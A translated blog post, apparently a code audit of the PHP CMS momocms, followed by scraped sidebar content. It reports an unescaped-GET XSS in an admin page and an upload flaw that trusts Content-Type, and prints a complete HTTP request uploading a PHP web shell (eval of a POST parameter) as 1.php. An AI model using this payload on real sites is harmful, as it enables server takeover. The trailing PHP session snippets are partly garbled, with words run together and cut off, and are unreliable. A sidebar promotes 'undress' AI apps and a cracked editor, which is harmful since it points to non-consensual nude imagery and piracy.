When I was bored, I saw a popular program on Webmaster Home, so I downloaded it and looked at it.
The front-end $_GET is filtered using the intval() function, and there is nothing to exploit.
There is an xss in the background
at line 96 of
admincreate_sub_product.php
<span style="font-family:Microsoft YaHei;font-size:18px;"><input type="hidden" name="category" value="<?php echo $_GET['id']; ?>"> <p> </p></span>

Second: Upload vulnerability
at admin/banner_do.php The code in
is as follows
<span style="font-family:Microsoft YaHei;font-size:18px;">require("./database.php"); if(empty($_SESSION['momocms_admin'])){ header("Location:./index.php"); exit; } if($_SESSION['momocms_isAdmin']==1){ if (($_FILES["banner"]["type"] == "image/gif") || ($_FILES["banner"]["type"] == "image/jpeg") || ($_FILES["banner"]["type"] == "image/png") || ($_FILES["banner"]["type"] == "image/pjpeg")) { if ($_FILES["banner"]["error"] > 0){ echo "Return Code: " . $_FILES["banner"]["error"] . "<br>"; }else{ if(!is_dir("../resource/slide/images")){ mkdir("../resource/slide/images"); } $pos = strrpos($_FILES["banner"]["name"],"."); $back = substr($_FILES["banner"]["name"],$pos); $_FILES["banner"]["name"] = time().$back; move_uploaded_file($_FILES["banner"]["tmp_name"], "../resource/slide/images/". $_FILES["banner"]["name"]); $pic="../resource/slide/images/". $_FILES["banner"]["name"]; echo '<script> parent.document.getElementById("successMsg").style.display="block"; setTimeout(function(){ parent.window.location.href="./banner.php"; },1500); </script>'; } } } </span>
You can see that upload to determines the upload type, but does not determine the upload suffix, etc.
So you can construct Content-type: image/jpeg to break through the upload
<span style="font-family:Microsoft YaHei;font-size:18px;">POST /test/momocms/admin/banner_do.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/test/momocms/admin/banner.php Cookie: PHPSESSID=a920be64bc19dc2b620e7ddab2441811 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------13761195204349 Content-Length: 227 -----------------------------13761195204349 Content-Disposition: form-data; name="banner"; filename="1.php" Content-Type: image/jpeg <?php eval($_POST['w']);?> -----------------------------13761195204349-- </span>

Then where can you directly modify the php source code in the background widget
I’ve seen so much for the time being. There are others to look at later.
The above introduces momocms code audit, including aspects of it. I hope it will be helpful to friends who are interested in PHP tutorials.

Thedifferencebetweenunset()andsession_destroy()isthatunset()clearsspecificsessionvariableswhilekeepingthesessionactive,whereassession_destroy()terminatestheentiresession.1)Useunset()toremovespecificsessionvariableswithoutaffectingthesession'soveralls

Stickysessionsensureuserrequestsareroutedtothesameserverforsessiondataconsistency.1)SessionIdentificationassignsuserstoserversusingcookiesorURLmodifications.2)ConsistentRoutingdirectssubsequentrequeststothesameserver.3)LoadBalancingdistributesnewuser

PHPoffersvarioussessionsavehandlers:1)Files:Default,simplebutmaybottleneckonhigh-trafficsites.2)Memcached:High-performance,idealforspeed-criticalapplications.3)Redis:SimilartoMemcached,withaddedpersistence.4)Databases:Offerscontrol,usefulforintegrati

Session in PHP is a mechanism for saving user data on the server side to maintain state between multiple requests. Specifically, 1) the session is started by the session_start() function, and data is stored and read through the $_SESSION super global array; 2) the session data is stored in the server's temporary files by default, but can be optimized through database or memory storage; 3) the session can be used to realize user login status tracking and shopping cart management functions; 4) Pay attention to the secure transmission and performance optimization of the session to ensure the security and efficiency of the application.

PHPsessionsstartwithsession_start(),whichgeneratesauniqueIDandcreatesaserverfile;theypersistacrossrequestsandcanbemanuallyendedwithsession_destroy().1)Sessionsbeginwhensession_start()iscalled,creatingauniqueIDandserverfile.2)Theycontinueasdataisloade

Absolute session timeout starts at the time of session creation, while an idle session timeout starts at the time of user's no operation. Absolute session timeout is suitable for scenarios where strict control of the session life cycle is required, such as financial applications; idle session timeout is suitable for applications that want users to keep their session active for a long time, such as social media.

The server session failure can be solved through the following steps: 1. Check the server configuration to ensure that the session is set correctly. 2. Verify client cookies, confirm that the browser supports it and send it correctly. 3. Check session storage services, such as Redis, to ensure that they are running normally. 4. Review the application code to ensure the correct session logic. Through these steps, conversation problems can be effectively diagnosed and repaired and user experience can be improved.

session_start()iscrucialinPHPformanagingusersessions.1)Itinitiatesanewsessionifnoneexists,2)resumesanexistingsession,and3)setsasessioncookieforcontinuityacrossrequests,enablingapplicationslikeuserauthenticationandpersonalizedcontent.


Hot AI Tools

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Undress AI Tool
Undress images for free

Clothoff.io
AI clothes remover

Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

Hot Tools

SublimeText3 Chinese version
Chinese version, very easy to use

SublimeText3 Linux new version
SublimeText3 Linux latest version

Dreamweaver Mac version
Visual web development tools

EditPlus Chinese cracked version
Small size, syntax highlighting, does not support code prompt function

MantisBT
Mantis is an easy-to-deploy web-based defect tracking tool designed to aid in product defect tracking. It requires PHP, MySQL and a web server. Check out our demo and hosting services.
